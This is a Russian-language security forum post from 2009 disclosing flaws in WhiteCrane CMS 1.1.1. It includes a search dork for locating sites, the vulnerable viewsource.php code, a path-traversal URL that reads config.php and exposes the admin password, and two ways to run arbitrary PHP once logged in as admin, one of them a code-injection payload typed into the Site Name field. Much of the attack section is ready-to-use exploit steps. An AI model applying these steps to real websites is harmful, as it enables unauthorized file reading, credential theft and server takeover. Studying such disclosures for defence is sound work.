ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости WhiteCrane
  #1  
Старый 19.04.2009, 18:33
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию Уязвимости WhiteCrane

Уязвимости WhiteCrane 1.1.1 (возможно и более ранние версии)

download: http://dev.ameoto.com/whitecrane111.zip

dork: "Powered by WhiteCrane"


1) [произвольное чтение файлов] (требования: register_globals=on)

/paper/plugins/viewsource.php

разработчик не учел возможность прямого доступа к скрипту и не защитил его от несанкционированного доступа
уязвимый код:
PHP код:
function viewsrc($page$config){
    if(isset(
$_REQUEST['act']) && $_REQUEST['act'] == "View Source"){
        
$full $config["path"] . $page $config["ext"];
        if(
file_exists($full)){
            
$contents file_get_contents($full);
            
//$contents = htmlspecialchars($contents);
            
echo '<h2>View Source <span style="font-size:x-small"><a href="?page='.$page.'">back</a></span></h2>';
            echo 
'<textarea name="message" id="canvas" rows="24">'.$contents.'</textarea>';
        }
    }
}
viewsrc($page$config); 
эксплуатирование:
Читаем конфиг сайта для последующего доступа к админ панели
Код:
http://localhost/hack/white/paper/plugins/viewsource.php?act=View+Source&page=../config.php
PHP код:
$user['admin'] = '12345'//сам логин и пароль к админке 
1) [произвольное выполнение php-кода] (требования: доступ в админ панель)
эксплуатирование:
1)через правку страницы
В данной CMS страницы сохраняются с расширением .php, позволяя нам их впоследствии интерпретировать. Дописываем любой php-код к странице (пример /index.php?page=home), и обращаемся к скрипту напрямую /pages/home.php
2)через правку конфига
Значения переменных при записе в конфиг, никаким образом не фильтруется, позволяя нам выполнить произвольный php-код.
К примеру в поле Site Name: вбиваем My site'; $a=phpinfo(); //
И напрямую обращаясь к конфигу (/paper/config.php), видим результат.

Последний раз редактировалось Iceangel_; 19.04.2009 в 18:38..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Форумы 74 07.06.2010 16:19
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости 9 15.08.2009 15:08
В Windows Mobile найдено две уязвимости ground_zero Мировые новости 1 06.02.2007 11:40
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ